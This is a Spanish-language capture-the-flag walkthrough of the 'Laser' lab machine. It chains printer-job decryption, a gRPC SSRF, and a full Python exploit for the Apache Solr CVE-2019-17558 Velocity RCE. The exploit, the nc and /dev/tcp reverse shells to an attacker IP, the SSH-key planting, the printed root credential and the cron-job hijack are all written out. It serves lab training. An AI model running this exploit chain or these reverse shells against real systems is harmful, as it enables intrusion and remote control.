# Laser

**OS**: Linux \
**Dificultad**: Insano \
**Puntos**: 50

## Resumen
- Pentesting Raw Printing (PRET)
- AES-CBC Decryption
- gRPC Service
- Apache Solr 8.2.0 (CVE 2019-17558)
- Pspy
- Docker tunel ssh

## Nmap Scan

`nmap -sV -sC -Pn -p- 10.10.10.201`

```
Nmap scan report for 10.10.10.201
Host is up (0.065s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9000/tcp open  cslistener?
9100/tcp open  jetdirect?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

En el escaneo se visualizan 3 puertos (22, 9000, 9100). Investigando que servicio aloja el puerto 9100 encontramos que hace referencia a la conexión de una impresora.

Leyendo sobre [Pentesting Raw Printing](https://book.hacktricks.xyz/pentesting/9100-pjl) existe una herramienta llamada [PRET](https://github.com/RUB-NDS/PRET) que nos permite enumerar el servicio.

`python ~/tools/PRET/pret.py 10.10.10.201 pjl`

![1](img/1.png)

En el directorio **pjl/jops** se encuentra el archivo **queued** que contiene información cifrada.

`cat queued`

![2](img/2.png)

Descargamos el archivo queued. A pesar de tener el archivo no es posible extraer la informacion, ya que está encriptada, después de enumerar utilizando el comando **nvram** podemos hacer dump de la memoria y se visualiza posiblemente la llave para desencriptar el archivo.

- `get queued`
- `nvram dump`
- `env`

![3](img/3.png)

![4](img/4.png)

### AES-CBC Decryption

Después de analizar el archivo es necesario hacer decode en base64 y posteriormente desencriptar en AES-CBC con la llave que habíamos obtenido anteriormente, nos apoyamos de un par de artículos para llevar a cabo este proceso ([Base64](https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/), [AES-CBC](https://nitratine.net/blog/post/python-encryption-and-decryption-with-pycryptodome/)).

Usamos el siguiente script para obtener **queued.pdf**.

##### decode.py
```python
from Crypto.Cipher import AES
import base64

base64_queued_data = open('queued', 'rb').read().strip()
base64_queued_data = base64_queued_data[2:len(base64_queued_data)-1]
base64_queued_decode = base64.b64decode(base64_queued_data)

queued_encrypted = base64_queued_decode[8:]
iv = queued_encrypted[:16]
key = '13vu94r6643rv19u'

cipher = AES.new(key, AES.MODE_CBC, iv)
queued_decrypted = cipher.decrypt(queued_encrypted)

open('queued.pdf', 'wb').write(queued_decrypted)
```

`python3 decode.py`

![5](img/5.png)

### gRPC Service

> gRPC es un marco de trabajo RPC (Remote Procedure Call) moderno, de código abierto y de alto rendimiento, que puede ejecutarse en cualquier entorno. Puede conectar servicios en centros de datos y entre ellos con soporte conectable para balanceo de cargas, seguimiento, verificación de estado y autenticación.

Leyendo el PDF ahora podemos saber para que se está utilizando el puerto **9000**, sabemos que este puerto comunica con **gRPC** nosotros deberíamos crear nuestro **gRPC client** para comunicarnos con el servicio. El siguiente [articulo](https://www.semantics3.com/blog/a-simplified-guide-to-grpc-in-python-6c4e25f0c506/) nos ayudará para hacerlo.

Tomando encuentra la leyenda que está escrita en el PDF podemos saber que contenido es necesario para la creación del archivo **.proto**.

```
We defined a Print service which has a RPC method called Feed. This method takes Content as input parameter and returns Data from the server.
The Content message definition specifies a field data and Data message definition specifies a field feed.
```

##### doom.proto
```
syntax = "proto3";

message Content {
    string data = 1;
}

message Data {
    float feed = 1;
}

service Print {
    rpc Feed(Content) returns (Data) {}
}
```

Procedemos a ejecutar **doom.proto**.

> Como lo menciona el articulo es necesario instalar ciertas dependencias. \
        - sudo pip3 install grpcio \
        - sudo pip3 install grpcio-tools

`python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. doom.proto`

![6](img/6.png)

Esto nos genera 2 archivos llamados **doom_pb2_grpc.py** y **doom_pb2.py** que importaremos en nuestro **client.py**.

##### client.py
```python
import sys, pickle, base64                                                                                                
import grpc, doom_pb2_grpc, doom_pb2                                                                                      
                                                                                                                          
payload = '{"feed_url":"http://10.10.14.167"}'                                                                            
payload = base64.b64encode(pickle.dumps(payload))                                                                         
channel = grpc.insecure_channel('10.10.10.201:9000')                                                                      
stub = doom_pb2_grpc.PrintStub(channel)                                                                                   
content = doom_pb2.Content(data=payload)

try:
    response = stub.Feed(content, timeout=10)
    print(response)
except Exception as ex:
    print(ex)
```

Ponemos a la escucha nuestro netcat y ejecutamos nuestro script.

- `sudo nc -lvnp 80`
- `python3 client.py`

![7](img/7.png)

En la salida de netcat nos regresa una conexión exitosa. Ahora es necesario enumerar los puertos locales del servidor para eso modificaremos el script anterior.

##### client.py
```python
import sys, pickle, base64
import grpc, doom_pb2_grpc, doom_pb2

for port in range(1, 65536):
    payload = '{"feed_url":"http://localhost:' + str(port) + '"}'
    payload = base64.b64encode(pickle.dumps(payload))
    channel = grpc.insecure_channel('10.10.10.201:9000')
    stub = doom_pb2_grpc.PrintStub(channel)
    content = doom_pb2.Content(data=payload)
    
    try:
        response = stub.Feed(content, timeout=10)
        print(port, response)
    except Exception as ex:
        if 'Connection refused' in ex.details():
            continue
```

`python3 client.py`

![8](img/8.png)

### Apache Solr 8.2.0 (CVE 2019-17558)

> Solr es un motor de búsqueda de código abierto basado en la biblioteca Java del proyecto Lucene, con API en XML/HTTP y JSON, resaltado de resultados, búsqueda por facetas, caché, y una interfaz para su administración.

El escaneo revela el puerto **8983** abierto localmente. Después de investigar un poco sobre este puerto, el servicio detrás de él es Apache Solr. Investigando un poco más, encontramos un [exploit](https://www.exploit-db.com/exploits/47572) para una versión vulnerable de este servicio. 

Leyendo más a fondo encontramos este [articulo](https://github.com/veracode-research/solr-injection#7-cve-2019-17558-rce-via-velocity-template-by-_s00py) que tiene un template para realizar el ataque.

El exploit consta básicamente de tres pasos:

```
GET /admin/cores - Obtener los nombres de todos los cores configurados
POST /core/<corename>/config - Cargara alguna configuración vulnerable en json
GET /core/<corename>/select - Activara el comando para que se ejecute
```

Después de prueba y error se logra obtener una reverse shell con el siguiente script.

##### rce.py
```python
import grpc
import pickle
import base64
import os
import urllib.parse
import sys
import json

import doom_pb2
import doom_pb2_grpc


def create_post_json_payload(path, host, port, data):
    request = "POST " + path + " HTTP/1.1\r\n"
    content_len = len(json.dumps(data))

    request += "Host: " + host + ":" + str(port) + "\r\n"
    request += "Content-Length: " + str(content_len) + "\r\n"
    request += "Content-Type: application/json\r\n"
    request += "Connection: close\r\n"
    request += "\r\n"
    request += json.dumps(data)
   
    payload = urllib.parse.quote(request)

    return payload


def create_get_payload(path, host, port, params):
    request = "GET " + path + "?"
    request += "&".join([k+"="+v for k,v in params.items()])
    request += " HTTP/1.1\r\n"
    request += "Host: " + host + ":" + str(port) + "\r\n"
    request += "Connection: close\r\n"
    request += "\r\n"
    
    payload = urllib.parse.quote(request)

    return payload


def create_content_message(port, url):
    data = {"feed_url": url}
    data = json.dumps(data)
    data = pickle.dumps(data)
    data = base64.urlsafe_b64encode(data)
    content = doom_pb2.Content(data=data)

    return content


def cve_2019_17558(core, host, port, cmd):
    
    data = {
        "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
        }
    }

    template ='''v.template.custom=#set($x="")
                 #set($rt=$x.class.forName("java.lang.Runtime")) 
                 #set($chr=$x.class.forName("java.lang.Character")) 
                 #set($str=$x.class.forName("java.lang.String")) 
                 #set($ex=$rt.getRuntime().exec("''' + cmd + '''")) 
                 $ex.waitFor()'''
    template = urllib.parse.quote(template)

    params = {"q": "1",
              "wt": "velocity",
              "v.template": "custom",
              "v.template.custom": template
             }

    payload1 = create_post_json_payload("/solr/" + core + "/config", host, port, data)
    url1 = "gopher://" + host + ":" + str(port) + "/_" + payload1
    payload2 = create_get_payload("/solr/" + core + "/select", host, port, params)
    url2 = "gopher://" + host + ":" + str(port) + "/_" + payload2


    with grpc.insecure_channel('10.10.10.201:9000') as channel:
        stub = doom_pb2_grpc.PrintStub(channel)

        content1 = create_content_message(port, url1)
        print(stub.Feed(content1))

        content2 = create_content_message(port, url2)
        print(stub.Feed(content2))

cmd = b"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.239 1234 >/tmp/f"
cmd = 'bash -c {echo,' + base64.b64encode(cmd).decode('utf-8') + '}|{base64,-d}|{bash,-i}'          
        
cve_2019_17558("staging", "localhost", 8983, cmd)
```

- `rlwrap nc -lvnp 1234`
- `python3 rce.py`

![9](img/9.png)

## Escalada de Privilegios (User)

Se puede visualizar que podemos escribir en **/var/solr/.ssh**. Escribiremos nuestra llave publica para conectarnos por SSH.

`find / -writable -type d 2>/dev/null`

![10](img/10.png)

`echo '<id_rsa.pub>' >> /var/solr/.ssh/authorized_keys`

![11](img/11.png)

`ssh solr@10.10.10.201`

![12](img/12.png)

### Pspy64

Enumeramos los procesos que están corriendo en tiempo real con la herramienta **pspy64**.

- `scp ~/tools/Linux/pspy64 solr@10.10.10.201:/tmp`
- `chmod +x /tmp/pspy64`
- `/tmp/pspy64`

![13](img/13.png)

Podemos ver un proceso en particular que está transfiriendo archivos a un contenedor Docker y se muestra el password del usuario root.

![14](img/14.png)

```
root : c413d115b3d87664499624e7826d8c5a
```

Utilizando el password nos conectamos por SSH al contenedor.

`ssh root@172.18.0.2`

![15](img/15.png)

## Escalada de Privilegios (Root)

En el contenedor Docker no se encuentra nada útil pero viendo los procesos nuevamente fuera del contenedor se están ejecutando 3 procesos como root cada cierto tiempo. El primer proceso sube el archivo **clear.sh** seguido de la ejecución del archivo para posteriormente borrarlo.

![16](img/16.png)

Como tenemos acceso root al contenedor Docker, y el servidor se conecta repetidamente al contenedor y ejecuta un archivo, podemos engañar al servidor para que ejecute nuestro archivo.

Primero creamos el archivo **clear.sh** en el directorio tmp con nuestra reverse shell y le damos permisos de solo lectura para asegurar que no se sobreescriba el contenido.

- `echo 'bash -i >& /dev/tcp/10.10.14.239/4444 0>&1' > /tmp/clear.sh`
- `chmod 555 /tmp/clear.sh`

![17](img/17.png)

Después matamos el servicio SSH para crear un túnel que reenviara el tráfico SSH al servidor.

- `kill -8 $(ps aux | grep -i ssh | head -n 1 | awk '{print $2}')`
- `mkfifo /tmp/backpipe`
- `while true; do /tmp/nc -l 22 0</tmp/backpipe | /tmp/nc 172.18.0.1 22 1>/tmp/backpipe; done`

![18](img/18.png)

Ponemos a la escucha nuestro netcat y cuando se reinicien los procesos obtendremos nuestra reverse shell.

`rlwrap nc -lvnp 4444`

![19](img/19.png)

## Referencias
https://book.hacktricks.xyz/pentesting/pentesting-printers \
https://book.hacktricks.xyz/pentesting/9100-pjl \
https://github.com/RUB-NDS/PRET \
https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/ \
https://nitratine.net/blog/post/python-encryption-and-decryption-with-pycryptodome/ \
https://grpc.io/docs/what-is-grpc/introduction/ \
https://www.semantics3.com/blog/a-simplified-guide-to-grpc-in-python-6c4e25f0c506/ \
https://www.exploit-db.com/exploits/47572 \
https://github.com/veracode-research/solr-injection#7-cve-2019-17558-rce-via-velocity-template-by-_s00py \
https://github.com/DominicBreuker/pspy